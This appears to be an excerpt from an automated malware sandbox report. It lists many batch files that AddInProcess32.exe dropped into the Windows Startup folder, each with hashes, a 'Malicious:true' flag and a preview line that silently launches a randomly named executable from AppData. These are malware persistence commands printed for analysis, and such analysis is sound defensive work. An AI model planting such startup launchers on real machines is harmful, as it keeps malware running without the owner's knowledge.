                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yja9y4U3Z3AC8NiP5CTtr4Gt.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.929128619506404
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WMSccnIIkdan:fE1sZ23WFcMD
                                                                                                                                                                                                                                MD5:764E94E5313A7604BA4ED2F993DF07B5
                                                                                                                                                                                                                                SHA1:6F0DECD618030DED40E6FA3C7C4CECB7AA6D15A9
                                                                                                                                                                                                                                SHA-256:D689359CF4FA044152391BECF091ED944A9C6C2FD88748ECE77037F77DFF519F
                                                                                                                                                                                                                                SHA-512:F8D7260BFD26A8F7E3AAC20674AB832C400D15D43A967CF9A69BC8CBB346E075EA7A8B5C2DA840535D7CF51DF79C0B6B802A9053A654A65B84709566FBC14B64
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yv6LDN6gTc8YJ8q14nqOwadt.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7767807551559835
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5x/ofggJKXEvn:fE1sZ235oIEv
                                                                                                                                                                                                                                MD5:2F791D250445908D2B2C6D8989913C04
                                                                                                                                                                                                                                SHA1:67947BA39674428ABD587E4DBB988761BC696784
                                                                                                                                                                                                                                SHA-256:9020E431C6C27ED519226E813C01D1D73F8E382183AAF4E1B989C9EAD42BC6BC
                                                                                                                                                                                                                                SHA-512:EF9B63BA032D889F2B67D4FF43432643B8A2D6335D713C2156A5942B6C6ABE0D202CA078DF655779E59257809E7E8BB9F138BFD4C4F1FBD51094AE4BC8CE5B22
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\TZNY2jGrHaeFElorDDQMNtS0.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZZdfK51JZVeSwQUZVWqostT0.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.844112125568592
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5mfmkNHASXnL0pkdan:fE1sZ23mLV3YpD
                                                                                                                                                                                                                                MD5:361741FA1BF31E074C0C753071BF40F6
                                                                                                                                                                                                                                SHA1:15FD6BFBA7D55B9D400E21609BDCC5F464100028
                                                                                                                                                                                                                                SHA-256:CB967304536F75D35CC3B01DC8D56B1814D4C1E6762F40456D43FDB716FABF79
                                                                                                                                                                                                                                SHA-512:8FF1BC730DAB5FF9A640CC5C1EC1C2DB0A2E6FF2AF89B6BF15BC442C348D9FED693E32DC47FD459016F81696EC7C1F3960BEFCFAA8A60A0B1BC41493907F1ED9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZboQ6QzDUJYdvbmW1ugLygi3.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.831148145366318
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5QtDd9Zm4mn:fE1sZ23QtD/Zc
                                                                                                                                                                                                                                MD5:C79DBA5B76202C1870C33527B5800A0B
                                                                                                                                                                                                                                SHA1:507D2ACAD62BEB76970E0D1FFF5A5C4DD62B7D09
                                                                                                                                                                                                                                SHA-256:679539A884B6EEBE43DC9A088FB54967E07282413B717E7ABCE783E12A03B23A
                                                                                                                                                                                                                                SHA-512:37F46CBB9B3012DFE9D0B46AD40CCE146364808B5A7B73309CBD8AACC6C5CB212836E961B1504280712F2A25137AF8AD44765B6CFD2D7F655BC81CB3C80AFEF6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ukkppf7mf9IddXdKqN6kNkCJ.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zf29JQFSkkWOPzBYpym8uJAy.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8400347838023645
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5zzMgfClykiF:fE1sZ23wviF
                                                                                                                                                                                                                                MD5:FE305602949787DDCEA4B533337FFA36
                                                                                                                                                                                                                                SHA1:101FB72ED03896224158AC717CF79F9AB783B2AB
                                                                                                                                                                                                                                SHA-256:52D1EFF465224E3582FDCDA95692063E34644FA70ADADE9C581432942ED59A49
                                                                                                                                                                                                                                SHA-512:7E044DED3FAA63AFAF207D444FE9C3FDEE8F2EA77487ED8D43F0E6ADBDA991CCD57572C698C5BA45F4F969F2559634C7D309D6D62C3EF976AD103113973EDD94
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\VKzps0C0te7NTLkv4QCHU1YW.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zg3gHfMVLuRw8ensa1FCPDaU.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.034046696090955
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5LRN/WRrLxmn:fE1sZ23VhoFm
                                                                                                                                                                                                                                MD5:65A75038D8CE0C6E236438CD793326A5
                                                                                                                                                                                                                                SHA1:8B2177CB7EC8CFCC6144D207AAFD34392E9ABE21
                                                                                                                                                                                                                                SHA-256:5265F3DAB59B1C39E2DD62404A9CB1C4ACF380D0522AFC15B92C6DB453F80426
                                                                                                                                                                                                                                SHA-512:ECEEA82C115F3FD2CB28A688546EE185E6C1F510E82E999D91412E69D0F1A9D3286C0A92EE4FCC4833B99AEE01DF29EB9EDA9AE13A2434F1A9F1021CCA1FBC21
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\nCCWNGZR7QSL7YK34Xz98mnq.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bRXCsNtemAFBshpyVJXEffxd.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.753684696555501
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5VccSy1JADJl:fE1sZ23659l
                                                                                                                                                                                                                                MD5:E1EC04E6DBF192B6BBFE03E0B5956847
                                                                                                                                                                                                                                SHA1:DF4F5B813237455750AD439D975E743C2997DB55
                                                                                                                                                                                                                                SHA-256:EF9C00E1A2B58EE463E8F51701481585E437F4FA579653C93644737CAB8499BE
                                                                                                                                                                                                                                SHA-512:643E0A1C854DC0F7544A7E23EE64F2E40AC59463418A8A3416B1BB82EE444C6FB6CB947D14A15D8B92852EC9EEB16321DC038E73AB1CF2037360398EDB350986
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\p9kj7yqazy7x5QKCpeuskKjf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbcng22Z0TSdvpG3NMlJFqMM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.753684696555502
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5MecsQEXvgCl:fE1sZ23MeZll
                                                                                                                                                                                                                                MD5:AC62135624BEAB08DD84F3D3EBF267D4
                                                                                                                                                                                                                                SHA1:996912E3F528447366CA3CD80EC83B8B61989FE1
                                                                                                                                                                                                                                SHA-256:6D84BFF83352C6E864BFE5AE8F684C3F57EC707A7281136CB52CA5A88DA3952A
                                                                                                                                                                                                                                SHA-512:CF3A8AE3E142D9B23447D66E159D01F78ADC0C77B7278C205A63090CE3583009B15655FF716D73FA94905E19570C450377E3C2EAD16C1BEE5A0068944C2E0808
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\i5XdJ65IHwp8ssJDgSUt738t.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bzGR4bdGfx80t9z5gTXhjS5m.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.825865131212691
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J51HcLKm0FP4m:fE1sZ23N6K1P4m
                                                                                                                                                                                                                                MD5:4ABE09697F3FAF1FCFBF331B790952BA
                                                                                                                                                                                                                                SHA1:7884304A6B191608EDC967EE07A9962CA32FDA57
                                                                                                                                                                                                                                SHA-256:A75E0781B61BC2F359FA79393B38A725A02959ED1CA4EF2F56A31D514761C9D3
                                                                                                                                                                                                                                SHA-512:7BB8C25ACDACD31EACE193D8FAE9D52AB738C7789C7830B562AF54FE363002B85DC6BF8DD0F801A34DAFDD3D7BF13A86C945470502043DCEA162989C9E825FBA
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c30OjsA06vP0OjpHU4TSEFXy.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.876125001130959
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J50J1WNEmSgTH4iF:fE1sZ230J1WdSQ
                                                                                                                                                                                                                                MD5:56F646EA3FB3536EB795983B6B1D3258
                                                                                                                                                                                                                                SHA1:F044FB0B62F7BD173143FB6B59B13A9D931C61D9
                                                                                                                                                                                                                                SHA-256:9FB2DC7144D6610677E2F80A148A812A5A058407CE4D1EC06B8C6C3D6ED6326C
                                                                                                                                                                                                                                SHA-512:E4855D8FB73B7E3180D2BC980FECA56F7C97BE5CA7EBD2D22AD222B8B97D128617FA8899080D7B19E5DE4C46A11D1CB8BD9882A36769465A4F5864122EAE8559
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\QbLPxQThjmTC7G98txUkfov6.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cYTbNzYImrDYIx7DZ1mq8uju.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7202570663169965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RnmMMOmDa6iF:fE1sZ23BmNJDuF
                                                                                                                                                                                                                                MD5:6294C940F617CE22CAC9678B04E15EF2
                                                                                                                                                                                                                                SHA1:10BBA616E43CCA3FCAC3247F65B08F2BB1BCE413
                                                                                                                                                                                                                                SHA-256:CC83F627A06367622A71E6CBD62D899A1503758AD0B8AE6CE811E0168D00572E
                                                                                                                                                                                                                                SHA-512:5798BE29756D68693BDF55508F793E6DD6EE4966FB08F24C517198600FEB112FF7FB34136379BC6692CEBCDFE04C9BCD31C6E1FCFE8439F7558769B34C5E55B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tByrAP8ibeDbCSADnquqVBQi.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cdlcSQxWa3EiYarbRMZZXW6B.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5djHGkVHLRQI6ca4iFn:fE1sZ23hHGcHKNcaVF
                                                                                                                                                                                                                                MD5:A559FC4727012940A277316F954FD163
                                                                                                                                                                                                                                SHA1:C061DE177BE854DE4044B1C7680168570078577D
                                                                                                                                                                                                                                SHA-256:DCE932C4B5E93A887D4B2099594B19A50C1330D3C7B423407EBE6AFBB0792852
                                                                                                                                                                                                                                SHA-512:4F67D80F9244CA0BB7A91F88968A1C17D0EA770FAB420E5396F8DA53ABDD7970343EE376B40734E43E9E27142821FFAB9783D33C9087764F2C0DC9F2464130C3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dfqsmrq9YcEQ7hPoIyQgCVFc.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.742137863481155
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5XU3bx7SmlbGL0diFn:fE1sZ23o7SmlbGIdm
                                                                                                                                                                                                                                MD5:3B5A8D3BAF4C3EA3CE7A7B1E64C0A167
                                                                                                                                                                                                                                SHA1:B37CCAA449F5DE8CD20E1DF5D4A3705D04718E96
                                                                                                                                                                                                                                SHA-256:6FD496E2A560A16B08539AA31F10D888D35E31E73AA7E44401DD380E96D2FF2A
                                                                                                                                                                                                                                SHA-512:E2C058A5CB7A62DEB4653B640B69F4A5FC99A83AEBF7766F1A4EB7D3E9578BE898F81F1EF3057C1CA907FBC243C74979E802BC4D508D0A1A8BCC4F9E023F6E70
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\r1G18V8V8shEwNWwtcDq5rcn.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\er4UWRAIc5nksPtzjAlnLniT.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859073
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5UpuVBJ50h8Aln:fE1sZ23Upq5lm
                                                                                                                                                                                                                                MD5:544235E7908BF8E3CBE3123D53109CA2
                                                                                                                                                                                                                                SHA1:3BDBD22B49B22C9102AE65D5B0EB590BAB3CABDE
                                                                                                                                                                                                                                SHA-256:1BC857476E1BCADE4282DFDE61D30E9EE0C427F8A7DC89FFD830F4567426D401
                                                                                                                                                                                                                                SHA-512:0D4FAC33E85F382761A53510F89F4F9023C6CB43AF1B31B8AD5DEB39D14504E44A2D0036E8232E13523EEBF79C62069C9B4047823A19C0B62F00B845D4D108A9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQToSS9BPvVcS8w6eNfcK0kY.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.89622386994129
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5SCs6Vkfo7ESsAl:fE1sZ23SCWInhl
                                                                                                                                                                                                                                MD5:645C64FCF28185FD58652725600E7678
                                                                                                                                                                                                                                SHA1:4990A53A6A3205E0AAC9246CD64D4DA2C94BB2ED
                                                                                                                                                                                                                                SHA-256:2A262C5277059B0127DDA9F911EC2ED167749DEDB8AC16A4655779C8DAF33DBE
                                                                                                                                                                                                                                SHA-512:23A84AD39AD4D4152378C584182CD3733F9D8024031B107F3D8C35C865D9F83619307AA6A85FDC450F4008188D799AC4286ED9159C3703D5F56FEE880ECF1D9D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wgX5ZSzR0AzMXHqanPag1gRj.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fagr44gehhmhQmsmZzIfzCC2.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8181539866382055
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5d9KIiF:fE1sZ23/KIm
                                                                                                                                                                                                                                MD5:09EC1E80E00067EDA62E15BFA0B15866
                                                                                                                                                                                                                                SHA1:3C19FC7423405C48D02968C4626899E534D7724C
                                                                                                                                                                                                                                SHA-256:85C3A05FDBFBAEAD1A3FB307C1C9DF547A05EFB7CC6BEA6D6D9A29E7CFB8A661
                                                                                                                                                                                                                                SHA-512:B1D84AB4FF117C39D4CB828CD210AB85756B73E783A380A631B87E14AE9E11A4C81FA52B8176F297071951A5308D7DCDEF4AA7B3572DB8A6722BA8CBFC396308
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\xXfU3dY2WEStW3xUEgs7rT08.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jR7LsmZUnB4FZaCYUqyCsVgJ.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.869020291048741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5D6eq7PuxPOH0sn:fE1sZ23iPuQHL
                                                                                                                                                                                                                                MD5:CCEDBE88FDA388E24684B705BDBC6247
                                                                                                                                                                                                                                SHA1:430C38B9298BD22F64E89BE0B2368EC55731266E
                                                                                                                                                                                                                                SHA-256:BFBDD8EFEA73D7D9792D8F013E12026720FE9417A7CA1F8C35D44A39A480073E
                                                                                                                                                                                                                                SHA-512:03D189A10F653DA1CF8A79B842CC288372FFE314D9680E5A0202FD8868E6BA50BEBEEE28A1A29B905813A2CCBC5A302E33E3A4DC8B0C7586099F1947B5ED3CDB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\fOd8yCx7heVUBotMVvn44Lkb.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kjmIHqcSIrCufgz14qWPPLBs.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5dtWMdhTKzwNln:fE1sZ23v/HucNl
                                                                                                                                                                                                                                MD5:F59A8D7C03899C56B104C54771774436
                                                                                                                                                                                                                                SHA1:06A75439FC248A122A7891BEAFE19053B4277800
                                                                                                                                                                                                                                SHA-256:54EA6EAA84F10FC41F8441E3200C9D67CFBF2BBA2D01EC0B37CC639E361F325A
                                                                                                                                                                                                                                SHA-512:FE835520648E6B73947F523F5F918208B90D71BED6392C3F68B2334EE1A1AC6574BDF121ADDB92042C9A2122EB81DA93DE4ABCDA1E244F4C31C8797DD306D569
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lfrK2eleGgknmu9FzWkpzB7c.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.918104667105449
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5t1p5qjWw:fE1sZ23HXeWw
                                                                                                                                                                                                                                MD5:63966E1FA5A95249E98365889EAB9465
                                                                                                                                                                                                                                SHA1:1A5BE4EA05AE1636E86770A5600534125169FB9C
                                                                                                                                                                                                                                SHA-256:7BCE376CB7223D5C32E2739EC6B39CDD7ECD8BC3E1AFAFC3D762715F7457FA22
                                                                                                                                                                                                                                SHA-512:9C90E07D395B650066F195F5F5194D9FD8C9233CE6FFCCDFEBE022D8DDA4E17AD8BC46991100950633C1089AB7607DF011EF7B880EF60502F3A7F3F45A99CF0B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\HPgOzBdOCsD6vN5fCp1Y0Y3P.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ljM3vcf9uuofRJ8ARCciU76L.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.047517753195889
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5UmiYGu8UTnb16ASkdan:fE1sZ23UmiYGrUTnb16ASD
                                                                                                                                                                                                                                MD5:2D9681948D37E0501BAA190F86D76684
                                                                                                                                                                                                                                SHA1:27005885F6949F137A0D73CC8D775B4734AC60C2
                                                                                                                                                                                                                                SHA-256:0D7F6ED768185AC5D288A4ABAF55ECB5160BF25F2A6FA432A47C4A092C7BE447
                                                                                                                                                                                                                                SHA-512:48025E2DC4E55B964F47D8A2EC581C3072A189F6CA493472B7B87CD71E8542367FACE23623EEA33A436786105E4D9C2118A28F1791D7283476D1DB3025D92280
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nqmQZESYWs8lMVQC5uSuvZGu.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.849193254030617
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5TTgPEmBln:fE1sZ23CBl
                                                                                                                                                                                                                                MD5:2DC90547CF077B561356A9C5B6B7F38F
                                                                                                                                                                                                                                SHA1:244A0B453EB0D07790A4A274D1464B64B13E1AE7
                                                                                                                                                                                                                                SHA-256:424268C17316FD8690FACE967AC20AA76D924E78AC22F8D305A5BE9E70A75DD5
                                                                                                                                                                                                                                SHA-512:585989381227DF80AD5DFC2E1A3C7D4D2A8886EF025A5533465B6642A4CB955B0C188C3AAEE2C70C7001F9797EC9A7B6D06E709603E414377770EFB940B20BF4
